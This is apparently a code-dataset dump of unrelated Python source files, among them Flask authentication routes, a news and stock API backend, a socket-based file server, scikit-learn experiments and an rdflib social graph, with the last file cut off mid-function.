text stringlengths 38 1.54M |
|---|
#!/usr/bin/env python
"""
Copyright (c) 2012, 2013, 2014 Centarra Networks, Inc.
Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted, provided that the above
copyright notice, this permission notice and all necessary source code
to recompile the software are included or otherwise available in all
distributions.
This software is provided 'as is' and without any warranty, express or
implied. In no event shall the authors be liable for any damages arising
from the use of this software.
"""
import blinker
import time
from digest import app, db
from digest.login.user import Session, get_session_user, login_required, User
from flask import session, redirect, url_for, escape, request, jsonify, escape, render_template
login_signal = blinker.Signal('A signal sent when the user logs in')
logout_signal = blinker.Signal('A signal sent when the user logs out')
authfail_signal = blinker.Signal('A signal sent when the user fails authentication')
@login_signal.connect_via(app)
def handle_session_login(*args, **kwargs):
user = kwargs.pop('user', None)
sess = Session(user)
session['session_id'] = sess.id
session['session_challenge'] = sess.challenge
user.signin_time = time.time()
db.session.add(user)
db.session.commit()
@logout_signal.connect_via(app)
def handle_session_logout(*args, **kwargs):
sess = Session.query.filter_by(id=session['session_id']).first()
if sess:
db.session.delete(sess)
db.session.commit()
session.pop('session_id')
session.pop('session_challenge')
def validate_login(username, password):
u = User.query.filter_by(username=username).first()
if u is None or not u.enabled:
authfail_signal.send(app, user=u, reason='Invalid username')
return False
if u.validate_password(password) is False:
authfail_signal.send(app, user=u, reason='Invalid password')
return False
# Password validation was successful, fire the login event.
login_signal.send(app, user=u)
return True
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
user = validate_login(request.form['username'], request.form['password'])
if user is not False:
return redirect(url_for('index'))
else:
session.pop('session_id', None)
session.pop('session_challenge', None)
return render_template('login.html', error='Invalid username or password')
return render_template('login.html')
@app.route('/logout')
def logout():
_user = get_session_user()
if _user is not None:
logout_signal.send(app, user=_user)
return redirect(url_for('index'))
@app.route('/create', methods=['GET', 'POST'])
def create():
if request.method == 'POST':
redir_target = request.form.get('outmodule', 'index')
try:
username = request.form['username'].strip().rstrip()
password = request.form['password'].strip().rstrip()
email = request.form['email'].strip().rstrip()
if len(username) == 0:
return render_template('create.html', error='No username provided')
if escape(username) != username or ' ' in username:
return render_template('create.html', error='Username contains invalid characters')
if len(password) == 0:
return render_template('create.html', error='No password provided')
if len(email) == 0:
return render_template('create.html', error='No email provided')
if escape(email) != email or '@' not in email:
return render_template('create.html', error='E-mail address is malformed')
user = User(username, email, password)
except:
return render_template('create.html', error='Username is already taken')
if user is not None:
sess = Session(user)
session['session_id'] = sess.id
session['session_challenge'] = sess.challenge
return redirect(url_for(redir_target))
return render_template('create.html')
@app.route('/reset', methods=['GET', 'POST'])
def reset_ui():
if request.method == 'POST':
username = request.form.get('username', '').strip().rstrip()
email = request.form.get('email', '').strip().rstrip()
from digest.login.user import User
user = User.query.filter_by(username=username).filter_by(email=email).first()
if not user:
return render_template('lost-password.html', error='The information provided does not match any account on file')
user.set_pwreset_key()
user.send_email('Please confirm your password reset request', 'email/lost-password-confirm.txt')
return render_template('lost-password.html', error='A confirmation message has been sent to the e-mail address on file')
return render_template('lost-password.html')
@app.route('/reset-confirm/<pwreset_key>', methods=['GET', 'POST'])
def reset_confirm(pwreset_key):
user = User.query.filter_by(pwreset_key=pwreset_key).first_or_404()
if request.method == 'POST':
password = request.form['password'].strip().rstrip()
user.assign_password(password)
user.set_pwreset_key()
return redirect(url_for('login'))
return render_template('lost-password-confirm.html', user=user)
@app.context_processor
def user_information_from_session():
"""A decorated function to give the templates a user object if we're logged in."""
_user = get_session_user()
if _user is not None:
return dict(user=_user)
return dict()
|
from django.db import models
from .organization import Organization
class TaskList(models.Model):
title = models.CharField(max_length=100)
datetime = models.DateTimeField(auto_now_add=True, null=True)
organization = models.ForeignKey(Organization, on_delete=models.PROTECT)
class Meta:
ordering = ['datetime']
def __str__(self):
return '%s %s' % (self.datetime, self.title) |
import unittest
from main import scale
class TestSum(unittest.TestCase):
a = "abcd\nefgh\nijkl\nmnop"
r = "aabbccdd\naabbccdd\naabbccdd\neeffgghh\neeffgghh\neeffgghh\niijjkkll\niijjkkll\niijjkkll\nmmnnoopp\nmmnnoopp\nmmnnoopp"
def test(self):
self.assertEqual(scale(self.a, 2, 3), self.r)
self.assertEqual(scale("", 5, 5), "")
self.assertEqual(scale("Kj\nSH", 1, 2), "Kj\nKj\nSH\nSH")
if __name__ == '__main__':
unittest.main()
|
from math import *
from collections import *
from heapq import *
class Solution:
def minCost(self, maxTime: int, edges, passingFees) -> int:
# fee, vertex, time
q = [(passingFees[0], 0, 0)]
n = len(passingFees)
times = [inf] * n
adj_lst = defaultdict(list)
for (s, e, t) in edges:
adj_lst[s].append((e, t))
adj_lst[e].append((s, t))
while q:
(fee, u, tu) = heapq.heappop(q)
if tu > maxTime:
continue
if u == n - 1:
return fee
if times[u] > tu:
times[u] = tu
for (v, t) in adj_lst[u]:
heapq.heappush(q, (fee + passingFees[v], v, tu + t))
return -1
|
# Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Util for generic operations for Resources."""
from google.cloud.forseti.common.gcp_type import backend_service
from google.cloud.forseti.common.gcp_type import billing_account
from google.cloud.forseti.common.gcp_type import bucket
from google.cloud.forseti.common.gcp_type import cloudsql_instance
from google.cloud.forseti.common.gcp_type import ke_cluster
from google.cloud.forseti.common.gcp_type import dataset
from google.cloud.forseti.common.gcp_type import folder
from google.cloud.forseti.common.gcp_type import groups_settings
from google.cloud.forseti.common.gcp_type import instance
from google.cloud.forseti.common.gcp_type import organization as org
from google.cloud.forseti.common.gcp_type import project
from google.cloud.forseti.common.gcp_type import resource
from google.cloud.forseti.common.gcp_type import role
from google.cloud.forseti.common.gcp_type import table
from google.cloud.forseti.services import utils
_RESOURCE_TYPE_MAP = {
resource.ResourceType.ORGANIZATION: {
'class': org.Organization,
'plural': 'Organizations',
'can_create_resource': True,
},
resource.ResourceType.BILLING_ACCOUNT: {
'class': billing_account.BillingAccount,
'plural': 'Billing Accounts',
'can_create_resource': True,
},
resource.ResourceType.FOLDER: {
'class': folder.Folder,
'plural': 'Folders',
'can_create_resource': True,
},
resource.ResourceType.PROJECT: {
'class': project.Project,
'plural': 'Projects',
'can_create_resource': True,
},
resource.ResourceType.BACKEND_SERVICE: {
'class': backend_service.BackendService,
'plural': 'Backend Services',
'can_create_resource': False,
},
resource.ResourceType.BUCKET: {
'class': bucket.Bucket,
'plural': 'Buckets',
'can_create_resource': True,
},
resource.ResourceType.CLOUD_SQL_INSTANCE: {
'class': cloudsql_instance.CloudSQLInstance,
'plural': 'Cloud SQL Instances',
'can_create_resource': True,
},
resource.ResourceType.DATASET: {
'class': dataset.Dataset,
'plural': 'Datasets',
'can_create_resource': True,
},
resource.ResourceType.INSTANCE: {
'class': instance.Instance,
'plural': 'GCE Instances',
'can_create_resource': True,
},
resource.ResourceType.KE_CLUSTER: {
'class': ke_cluster.KeCluster,
'plural': 'GKE Clusters',
'can_create_resource': True,
},
resource.ResourceType.ROLE: {
'class': role.Role,
'plural': 'Roles',
'can_create_resource': True,
},
resource.ResourceType.TABLE: {
'class': table.Table,
'plural': 'Tables',
'can_create_resource': True,
},
resource.ResourceType.GROUPS_SETTINGS: {
'class': groups_settings.GroupsSettings,
'plural': 'Groups Settings',
'can_create_resource': True,
},
}
def create_resource(resource_id, resource_type, **kwargs):
"""Factory to create a certain kind of Resource.
Args:
resource_id (str): The resource id.
resource_type (str): The resource type.
**kwargs (dict): Extra args.
Returns:
Resource: The new Resource based on the type, if supported,
otherwise None.
"""
if resource_type not in _RESOURCE_TYPE_MAP:
return None
resource_type = _RESOURCE_TYPE_MAP[resource_type]
if not resource_type.get('can_create_resource'):
return None
return resource_type.get('class')(
resource_id, **kwargs)
def create_resource_from_db_row(row):
"""Create a resource type from a database resource row.
Args:
row (Resource): the database resource row.
Returns:
Resource: the concrete resource type.
"""
parent = (
create_resource_from_db_row(row.parent) if row.parent else None)
return create_resource_from_json(row.type, parent, row.data)
def create_resource_from_json(resource_type, parent, json_string):
"""Factory to create a certain kind of Resource from JSON data.
Args:
resource_type (str): The resource type.
parent (Resource): parent resource of this type.
json_string (str): resource's JSON data.
Returns:
Resource: The new Resource based on the type, if supported,
otherwise None.
"""
if resource_type not in _RESOURCE_TYPE_MAP:
return None
resource_type = _RESOURCE_TYPE_MAP[resource_type]
if not resource_type.get('can_create_resource'):
return None
return resource_type.get('class').from_json(parent, json_string)
def get_ancestors_from_full_name(full_name):
"""Creates a Resource for each resource in the full ancestory path.
Args:
full_name (str): The full resource name from the model, includes all
parent resources in the hierarchy to the root organization.
Returns:
list: A list of Resource objects, from parent to base ancestor.
"""
resource_ancestors = []
for (resource_type, resource_id) in utils.get_resources_from_full_name(
full_name):
resource_ancestors.append(create_resource(resource_id, resource_type))
return resource_ancestors
def pluralize(resource_type):
"""Determine the pluralized form of the resource type.
Args:
resource_type (str): The resource type for which to get its plural form.
Returns:
str: The pluralized version of the resource type, if supported,
otherwise None.
"""
if resource_type not in _RESOURCE_TYPE_MAP:
return None
return _RESOURCE_TYPE_MAP.get(resource_type).get('plural')
def type_from_name(resource_name):
"""Determine resource type from resource name.
Args:
resource_name (str): The unique resoure name, with the format
"{resource_type}/{resource_id}".
Returns:
str: The resource type, if it exists, otherwise None.
"""
if not resource_name:
return None
for (resource_type, metadata) in _RESOURCE_TYPE_MAP.items():
if resource_name.startswith(metadata['plural'].lower()):
return resource_type
return None
def cast_to_gcp_resources(resources_to_cast):
"""Get a list Resource objects from a list of dict resource descriptors
Args:
resources_to_cast (list): A list of resource descriptors
as dictionaries.
[{'resourceId': {'id': '3456', 'type': 'Project'}}
{'resourceId': {'id': '1234', 'type': 'Organization'}}]
Returns:
list: A list of cast Resource objects
"""
cast_resources = []
for resource_to_cast in resources_to_cast:
resource_id = resource_to_cast['resourceId']['id']
resource_type = resource_to_cast['resourceId']['type']
cast_resource = create_resource(resource_id, resource_type)
cast_resources.append(cast_resource)
return cast_resources
|
import numpy as np
from sklearn import linear_model
from sklearn import preprocessing
from sklearn import metrics,neighbors
import matplotlib.pyplot as plt
from sklearn.cross_validation import train_test_split,cross_val_score
Observations = np.genfromtxt("./Observations.csv",dtype = float,defaultfmt = "%.3e",delimiter = ',')
ClassLabels = np.genfromtxt("./ClassLabels.csv",dtype = float,defaultfmt = "%d",delimiter = ',')
# Perturb the observations with the noise:
sigma = 0.09
mu=0
Observations = Observations + (sigma * np.random.randn(Observations.shape[0],Observations.shape[1]) + mu)
plt.plot(Observations[0,:])
X_train, X_test, y_train, y_test = train_test_split(Observations, ClassLabels, test_size=0.3, random_state=123)
stds = np.apply_along_axis(np.std, 0, Observations)
plt.plot(stds)
logreg = linear_model.LogisticRegressionCV(multi_class = "ovr",Cs= 20)
EQfit = logreg.fit(X_train, y_train)
#n_neighbors = 50
#KNN =neighbors.KNeighborsClassifier(n_neighbors, weights='uniform')
#EQfit = KNN.fit(X_train, y_train)
predicted = EQfit.predict(X_test)
probs = EQfit.predict_proba(X_test)
ConfMatrix = metrics.confusion_matrix(y_test,
predicted)
ScoreMetric = metrics.accuracy_score(y_test, predicted)
# Scores with various random inits:
scores = cross_val_score(EQfit, Observations, ClassLabels, cv=10)
# Analyze standard deviations per feature
# Now when we learned on a low-res, lets apply to high res:
# Try to aggregate classes:
ObservationsDiffRes = np.genfromtxt("../8Class/Observations.csv",dtype = float,defaultfmt = "%.3e",delimiter = ',')
ClassLabelsDiffRes = np.genfromtxt("../8Class/ClassLabels.csv",dtype = float,defaultfmt = "%d",delimiter = ',')
ObservationsDiffRes = ObservationsDiffRes + (sigma * np.random.randn(ObservationsDiffRes.shape[0],ObservationsDiffRes.shape[1]) + mu)
# delete non-midpoint classes:
OrigLab = ClassLabelsDiffRes
#ClassLabels8Class[np.in1d(ClassLabels8Class, (0,1))] = 0
#ClassLabels8Class[np.in1d(ClassLabels8Class, (2,3))] = 1
#ClassLabels8Class[np.in1d(ClassLabels8Class, (4,5))] = 2
#ClassLabels8Class[np.in1d(ClassLabels8Class, (6,7))] = 3
# Include midpoints only
inds_midpoints = np.in1d(ClassLabelsDiffRes, (1,2,5,6))
ClassLabelsDiffRes = ClassLabelsDiffRes[inds_midpoints]
# Drop the unnecessary observations:
ObservationsDiffRes = ObservationsDiffRes[inds_midpoints,:]
probsDiffRes= EQfit.predict_proba(ObservationsDiffRes)
PredictedDiffRes = EQfit.predict(ObservationsDiffRes)
#AccuracyDiffRes = metrics.accuracy_score(ClassLabelsDiffRes, PredictedDiffRes)
#ConfMatrix = metrics.confusion_matrix(ClassLabelsDiffRes,
# PredictedDiffRes)
for midPoint in [1,2,5,6]:
midpoint_in_DiffRes = np.in1d(ClassLabelsDiffRes, (midPoint))
averageValues = np.sum(probsDiffRes[midpoint_in_DiffRes,:],axis =0)
#plt.plot(ObservationsDiffRes[midpoint_in_DiffRes,:][2])
fig,ax = plt.subplots(1)
ax.plot(averageValues)
ax.set_title("Class %d " % (midPoint))
#scaler = preprocessing.StandardScaler(with_mean = False,with_std = False).fit(Observations)
|
from flask import Flask, jsonify
import requests
from flask_cors import CORS
from os import link
import os
from bs4 import BeautifulSoup
import re
import json
import yfinance as yf
from pymongo import MongoClient
# mongo DB
client = MongoClient(os.environ.get('MONGO_DB', 'localhost'), 27017)
db = client.news
posts = db.posts
app = Flask(__name__)
CORS(app)
# weather- Weatherbit.io API
WEATHER_KEY = os.environ['WEATHER_KEY']
NEWS_KEY = os.environ['NEWS_KEY']
ALPHA_VANTAGE_KEY = os.environ['ALPHA_VANTAGE_KEY']
@app.route('/api/weather/<country>/<city>', methods=['GET'])
def weather(country, city):
API_KEY = WEATHER_KEY
url = f'https://api.weatherbit.io/v2.0/current?city={city}=&country={country}&key={API_KEY}'
resp = requests.get(url)
return resp.content
# news- News API
@app.route('/api/news/<country>', methods=['GET'])
def news(country):
API_KEY = NEWS_KEY
url = ('http://newsapi.org/v2/top-headlines?'
f'country={country}&'
'pageSize=100&'
f'apiKey={API_KEY}')
response = requests.get(url)
return response.content
# world news- News API
@app.route('/api/world', methods=['GET'])
def world():
API_KEY = NEWS_KEY
url = ('https://newsapi.org/v2/everything?'
'domains=bbc.com,cnn.com,theguardian.com'
'sortBy=popularity&'
'pageSize=100&'
'language=en&'
f'apiKey={API_KEY}')
response = requests.get(url)
return response.content
# sport- News API
@app.route('/api/sport/<q>', defaults={'language': 'en'}, methods=['GET'])
@app.route('/api/sport/<q>/<language>', methods=['GET'])
def sport(q, language):
API_KEY = NEWS_KEY
url = ('https://newsapi.org/v2/everything?'
f'q={q}&'
'pageSize=20&'
f'language={language}&'
f'apiKey={API_KEY}')
response = requests.get(url)
return response.content
# currency- ALPHA VANTAGE API
# sending some data to MongoDB for better performance
@app.route('/api/currency/<fromCurrency>/<toCurrency>', methods=['GET'])
def currency(fromCurrency, toCurrency):
collection = db.currency
x = list(collection.find())
if len(x) == 0:
API_KEY = ALPHA_VANTAGE_KEY
url = ('https://www.alphavantage.co/query?function=CURRENCY_EXCHANGE_RATE&'
f'from_currency={fromCurrency.upper()}&'
f'to_currency={toCurrency.upper()}&'
f'apikey={API_KEY}')
data = requests.get(url)
collection.insert_one({'currency': data.content})
return data.content
else:
return x[0]['currency']
# company look up- ALPHA VANTAGE API
@app.route('/api/company/<company_name>', methods=['GET'])
def company(company_name):
API_KEY = ALPHA_VANTAGE_KEY
url = ('https://www.alphavantage.co/query?function=SYMBOL_SEARCH&'
f'keywords={company_name}&'
f'apikey={API_KEY}')
response = requests.get(url)
return response.content
# daily stock- ALPHA VANTAGE API
@app.route('/api/stock/<symbol>', methods=['GET'])
def stock(symbol):
API_KEY = ALPHA_VANTAGE_KEY
url = ('https://www.alphavantage.co/query?function=TIME_SERIES_DAILY&'
f'symbol={symbol}&'
f'apikey={API_KEY}')
response = requests.get(url)
return response.content
# company stock check - yahoo finance API
# sending some data to MongoDB for better performance
@app.route('/api/yahoo', methods=['GET'])
def yahoo():
collection = db.stock
x = list(collection.find())
if len(x) == 0:
data = yf.download(
tickers="SPY AAPL MSFT DIS GOOGL BP KO FB WMT",
period="ytd",
interval="1wk",
group_by='ticker',
auto_adjust=True,
prepost=True)
json_file = data.xs('Close', level=1, axis=1).reset_index().to_json(
orient='records')
collection.insert_one({'stocks': json.loads(json_file)})
return json_file
else:
return jsonify(x[0]['stocks'])
@app.route('/api/science', methods=['GET'])
def science():
# web scraping Nature (only data available for scraping, checked with robots.txt)
# sending some data to MongoDB for better performance
collection = db.science
x = list(collection.find())
if len(x) == 0:
res = requests.get('https://www.nature.com/news')
soup = BeautifulSoup(res.text, 'html.parser')
# link to website
links = []
for link in soup.findAll('a', class_='u-flex__container', attrs={'href': re.compile("^http://")}):
links.append(link.get('href'))
# photo to article
articles = soup.find_all('div', class_='u-responsive-ratio')
imagesEl = []
for article in articles:
imagesEl.append(article.findAll('img'))
imagesSrc = []
for image in imagesEl:
imagesSrc.append(['http:' + x['src'] for x in image])
flat_list_images = []
for sublist in imagesSrc:
for item in sublist:
flat_list_images.append(item)
# article title
subtitle = []
titles = []
title = soup.find_all('div', class_='c-card__copy--major')
for el in title:
subtitle.append(el.find_all(class_='c-card__title'))
flat_title = []
for sublist in subtitle:
for item in sublist:
flat_title.append(item)
for text in flat_title:
titles.append(text.getText())
# description
description = []
descrip = soup.find_all('div', class_='c-card__standfirst--major')
for text in descrip:
description.append(text.getText())
# date
span = []
date = []
dat = soup.find_all('div', class_='c-card__footer--major')
for s in dat:
span.append(s.find_all('span', class_='c-card__date'))
flat_span = []
for sublist in span:
for item in sublist:
flat_span.append(item)
for text in flat_span:
date.append(text.getText())
# creating JSON
length = len(date)
data = []
for x in range(length):
data.append({'link': links[x], 'img': flat_list_images[x],
'title': titles[x], 'description': description[x],
'date': date[x]
})
json_data = json.dumps(data)
return json_data
else:
return x
if __name__ == "__main__":
app.run(host='0.0.0.0')
|
print ("11")
print ("10")
print ("9")
print ("8")
print ("7")
print ("6")
print ("5")
print ("4")
print ("3")
print ("2")
print ("1") |
import socket
import os
import shutil
import logging
import json
import hashlib
import binascii
from threading import Thread
"""
pwd - print working directory name
ls - shows inner of working dir
cat <filename> - shows inner of file
mkdir <dir name> - make dir
remdir <dir name> - delete dir with evrthng in it
rm <filename> - delete file
rename <filename> - rename file
sends <filename1> <filename2> - send f1 to server as f2
sendc <filename1> <filename2> - send f1 to client as f2
cd <..>/<dir_name> - change dir <1 lvl down>/<1 lvl up>
"""
PORT = 1556
hom_dir = os.path.join(os.getcwd(), 'docs')
cur_dir = hom_dir
def hash_password(password: str) -> str:
salt = hashlib.sha256(os.urandom(60)).hexdigest().encode('ascii')
pwdhash = hashlib.pbkdf2_hmac('sha512', password.encode('utf-8'), salt, 100000)
pwdhash = binascii.hexlify(pwdhash)
return (salt + pwdhash).decode('ascii')
def verify_password(stored_password: str, provided_password: str) -> bool:
salt = stored_password[:64]
stored_password = stored_password[64:]
pwdhash = hashlib.pbkdf2_hmac(
'sha512',
provided_password.encode('utf-8'),
salt.encode('ascii'),
100000
)
pwdhash = binascii.hexlify(pwdhash).decode('ascii')
return pwdhash == stored_password
def connection_with_auth(sock):
conn, addr = sock.accept()
address = ':'.join([str(i) for i in addr])
if address in data_users['users']:
conn.send(f"Hello {data_users['users'][address]['name']}! Enter passw".encode())
while True:
data_password = conn.recv(1024).decode()
if not data_password:
conn.send(f"Incorrect passw".encode())
else:
if verify_password(data_users['users'][address]['password'], data_password):
conn.send(f"Welcome".encode())
break
else:
conn.send(f"Incorrect passw".encode())
conn.send("Enter passw".encode())
else:
conn.send(f"Name:".encode())
data_name = conn.recv(1024).decode()
conn.send(f"Passw:".encode())
data_pass = conn.recv(1024).decode()
if not data_name or not data_pass:
conn.send(f"Incorrect".encode())
return None, None, None
data_users['users'][address] = {'name': data_name, 'password': hash_password(data_pass)}
with open('data_users.json', 'w') as file:
json.dump(data_users, file)
conn.send(f"Welcome {data_name}. Password added".encode())
# conn.send("Ok".encode())
return conn, addr, data_users['users'][address]['name']
class ClientThread(Thread):
def __init__(self, conn, addr, name):
Thread.__init__(self)
self.conn = conn
self.addr = addr
self.ip = addr[0]
self.port = addr[1]
self.name = name
logger.info(f"Connect client {addr[0]}:{addr[1]}")
def run(self):
while True:
try:
data = self.conn.recv(1024).decode()
if data == 'stop' or not data:
logger.info(f"Disconnect client {self.addr[0]}:{self.addr[1]}")
self.conn.close()
break
else:
logger.info(f"From client {self.addr[0]}:{self.addr[1]} - {data}")
response = self.process(data)
logger.info(f"To client {self.addr[0]}:{self.addr[1]} - {response}")
try:
self.conn.send(response.encode())
except BrokenPipeError:
logger.info(f"Disconnect client {self.addr[0]}:{self.addr[1]}")
# conn.send(data.upper())
except ConnectionResetError:
self.conn.close()
def process(self, req):
global cur_dir
global hom_dir
try:
bool_var = False
for i in ['pwd', 'ls', 'cat', 'mkdir', 'remdir', 'rm', 'rename', 'sends', 'sendc', 'cd']:
if req.startswith(i):
bool_var = True
break
assert bool_var, "Incorrect command"
if req == 'pwd':
return cur_dir
elif req == 'ls':
return '; '.join(os.listdir(cur_dir))
elif req[:3] == 'cat':
filename = req[4:]
if filename not in os.listdir(cur_dir):
return "Dir doesnt exist"
else:
with open(os.path.join(cur_dir, filename), 'r', encoding='utf-8') as f:
inner = f.read()
return inner
elif req[:5] == 'mkdir':
filename = req[6:]
if filename in os.listdir(cur_dir):
return "Dir doesnt exist"
else:
if filename.startswith(cur_dir):
os.mkdir(os.path.join(cur_dir, filename))
return 'Dir ' + req[6:] + ' created'
else:
return "Err"
elif req[:6] == 'remdir':
filename = req[7:]
if filename not in os.listdir(cur_dir):
return "Dir doesnt exist"
else:
shutil.rmtree(os.path.join(cur_dir, filename))
return 'Dir ' + req[7:] + ' deleted'
elif req[:2] == 'rm':
filename = req[3:]
if filename not in os.listdir(cur_dir):
return "File doesnt exist"
else:
os.remove(os.path.join(cur_dir, filename))
return 'File ' + req[3:] + ' deleted'
elif req[:6] == 'rename':
lst = list(req.split())
if len(lst) != 3:
return "Incorrect args"
else:
if lst[1] not in os.listdir(cur_dir):
return "File doesnt exist"
else:
os.rename(os.path.join(cur_dir, lst[1]), os.path.join(cur_dir, lst[2]))
return 'File ' + lst[1] + ' renamed to ' + lst[2]
elif req[:5] == 'sends':
lst = list(req.split(' ', 2))
if lst[1] in os.listdir(os.path.join(os.getcwd(), 'server')):
return "Can't rewrite file"
else:
with open(os.path.join(os.path.join(os.getcwd(), 'server'), lst[1]), 'w', encoding='utf-8') as f2:
f2.write(' '.join(lst[2:]))
return "File copied"
elif req[:5] == 'sendc':
lst = list(req.split())
with open(os.path.join(os.path.join(os.getcwd(), 'server'), lst[1]), 'r', encoding='utf-8') as f1:
inner = f1.read()
string = 'sendc ' + lst[2] + ' ' + inner
self.conn.send(string.encode())
elif req[:2] == 'cd':
if len(req)==2:
return "Err"
elif req[3:5] == '..':
parts = cur_dir.split("/")
pathing = "/".join(parts[:-1])
if pathing.startswith(hom_dir):
os.chdir(pathing)
else:
return "Err"
else:
pathing = cur_dir + '/' + req[3:]
if pathing.startswith(hom_dir):
os.chdir(pathing)
else:
return "Err"
cur_dir = os.getcwd()
return "Dir changed"
except AssertionError:
return "Incorrect command"
try:
with open("data_users.json", "r") as read_file:
data_users = json.load(read_file)
except FileNotFoundError:
with open("data_users.json", 'wt') as write_file:
data_users = {'users': {}}
json.dump(data_users, write_file)
# Создается и используется объект логгирования
logger = logging.getLogger("serverLogger")
logger.setLevel(logging.INFO)
fh = logging.FileHandler("server.log")
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
logger.addHandler(fh)
# logger.info("Start client session")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('', PORT))
# sock.listen(5)
# print("Listen port", PORT)
# conn, addr = sock.accept()
# logger.info(f"Connect client {addr[0]}:{addr[1]}")
threads = []
while True:
sock.listen()
clientsock, clientAddress, name = connection_with_auth(sock)
newthread = ClientThread(clientsock, clientAddress, name)
newthread.start()
conn.close()
sock.close()
|
from django.db import models
from django.contrib.auth.models import User, UserManager
#class User(models.Model):
# username=models.CharField(max_lenght=30)
# password=models.CharField(max_lenght=70)
# Email=models.models.EmailField(max_length=254)
class UserprofileInfo(models.Model):
user = models.OneToOneField(User, on_delete=models.PROTECT)
protfoils_site = models.URLField(blank=True)
ready = models.BooleanField(default=True)
pic = models.ImageField()
def __str__(self):
return self.user.username |
import tkinter
top = tkinter.Tk()
hello = tkinter.Label(top, text='Hello World!')
hello.pack()
quit_tk = tkinter.Button(top, text='QUIT', command=top.quit, bg='red', fg='white')
quit_tk.pack(fill=tkinter.X, expand=1)
tkinter.mainloop()
|
# importamos lo necesario para el formato de la entrada
import datetime
import os
import sys
import re
import time
import numpy as np
try:
import imdb
except ImportError:
imdb = None
from tabulate import tabulate
from pprintpp import pprint
# blank node
# a ConjunctiveGraph is an aggregation of all the named graphs in a store.
from rdflib import BNode, ConjunctiveGraph, URIRef, Literal, Namespace, RDF
# importamos FOAF: viene del acronimo Friend Of Friend, el cual es utilizado para describir relacion entre personas tales como en una red social.
from rdflib.namespace import FOAF, DC
storefn = os.path.expanduser("~/movies.n3")
userfn = os.path.expanduser("~/users.n3")
storeuri = "file://" + storefn
useruri = "file://" + userfn
title_store = "Movie Theater"
title_user = "Fábrica de usuarios"
r_cinema = re.compile(r"^(.*?) <(((https|http)?):((//)|(\\\\))+[\w\d:#@%/;$()~_?\+-=\\\.&]*)>$")
r_newuser = re.compile(r"^(.*?) <([a-z0-9_-]+(\.[a-z0-9_-]+)*@[a-z0-9_-]+(\.[a-z0-9_-]+)+)>$")
IMDB = Namespace("http://www.csd.abdn.ac.uk/~ggrimnes/dev/imdb/IMDB#")
# predicate: vocabulary for expressing reviews and ratings using the RDF
REV = Namespace("http://purl.org/stuff/rev#")
# predicate: friendship relationship
REL = Namespace("https://www.perceive.net/schemas/20031015/relationship/")
class DoConjunctiveGraph:
def __init__(self, pathfn, uri, title):
self.title = title
self.pathfn = pathfn
self.uri = uri
self.graph = ConjunctiveGraph() # instancia del grafo
if os.path.exists(self.pathfn):
self.graph.load(self.uri, format="n3")
# enlaza los prefijos para el namespace
self.graph.bind("dc", DC) # Para enlazar los prefijos
self.graph.bind("imdb", IMDB)
self.graph.bind("rev", REV)
def save(self):
self.graph.serialize(self.uri, format="n3")
def len(self): # Contar el numero de triples
return self.graph.__len__()
def help():
print("Revisar : https://www.w3.org/TR/turtle/#BNode")
class UserFactory(DoConjunctiveGraph):
def __init__(self, pathfn, uri, title):
#self.title = "Fabrica de Usuarios"
DoConjunctiveGraph.__init__(self, pathfn, uri, title)
# enlazamos las relaciones
self.graph.bind("foaf", FOAF)
self.graph.bind("rel", REL)
# agregamos el triple del titulo cuando se inicializa
self.graph.add((URIRef(self.uri), DC["title"], Literal(self.title)))
# self.save()
def new_user(self, user_data=None):
# al agregar un usuario verificamos que sea de acuerdo a la expresion regular
user_nick, user_email = (r_newuser.match(user_data).group(
1), r_newuser.match(user_data).group(2))
# agregamos el triple que corresponde con el usuario su nick y su correo al sujeto se le concatena su nickname para darle una identidad
self.graph.add((URIRef(self.uri + "#%s" %
user_nick), RDF.type, FOAF["Person"]))
self.graph.add((URIRef(self.uri + "#%s" % user_nick),
FOAF["nick"], Literal(user_nick)))
self.graph.add((URIRef(self.uri + "#%s" % user_nick),
FOAF["mbox"], Literal(user_email)))
# este metodo llama al serialize el cual lo guarda en este directorio
self.save()
return user_nick # para poder trabajar con nick ya serializado en el archivo n3
def set_user_name(self, user_nick, user_name):
if not self.user_is_in(user_nick):
raise Exception("El nick %s no está registrado" % user_nick)
# agregamos el triple de tipo FOAF que agrega el username
self.graph.add((URIRef(self.uri + "#%s" % user_nick),
FOAF["name"], Literal(user_name)))
self.save()
def set_friends(self, user_nick_me, user_nick_you):
if not (self.user_is_in(user_nick_me) and self.user_is_in(user_nick_you)):
raise Exception("Algún amigo no está registrado")
# agregamos dos triples que indican la amistad entre las personas, las cuales estaran asociadas a los sujetos
self.graph.add((URIRef(self.uri + "#%s" % user_nick_you),
REL["friendOf"], URIRef(self.uri + "#%s" % user_nick_me)))
self.graph.add((URIRef(self.uri + "#%s" % user_nick_me),
REL["friendOf"], URIRef(self.uri + "#%s" % user_nick_you)))
print("Amistad establecida")
self.save()
def list_friends(self):
# rdflib permite hacer sparql
return self.graph.query(
""" SELECT ?aname ?bname
WHERE {
?a rel:friendOf ?b .
?a foaf:name ?aname .
?b foaf:name ?bname .
}""")
def list_users(self):
return self.graph.query(
""" SELECT DISTINCT ?nick
WHERE {
?p foaf:nick ?nick .
}""")
def list_friends_of_nick(self, nick_user):
return self.graph.query(
""" SELECT DISTINCT ?nick
WHERE {
?p foaf:nick "%s" .
?p rel:friendOf ?q .
?q foaf:nick ?nick .
}""" % nick_user)
def get_user_uri(self, user_nick):
return URIRef(self.uri + "#%s" % user_nick)
# return self.graph.objects(URIRef(self.uri+"#felipeturing"), FOAF["name"])
def user_by_nick(self, nick_user):
return self.graph.query(
""" SELECT ?nick ?name ?mbox
WHERE {
?p foaf:nick "%s" .
?p foaf:nick ?nick .
?p foaf:name ?name .
?p foaf:mbox ?mbox .
}""" % nick_user)
def user_is_in(self, user_nick):
# verifica si el triple de tipo persona con nick_name esta en el grafo
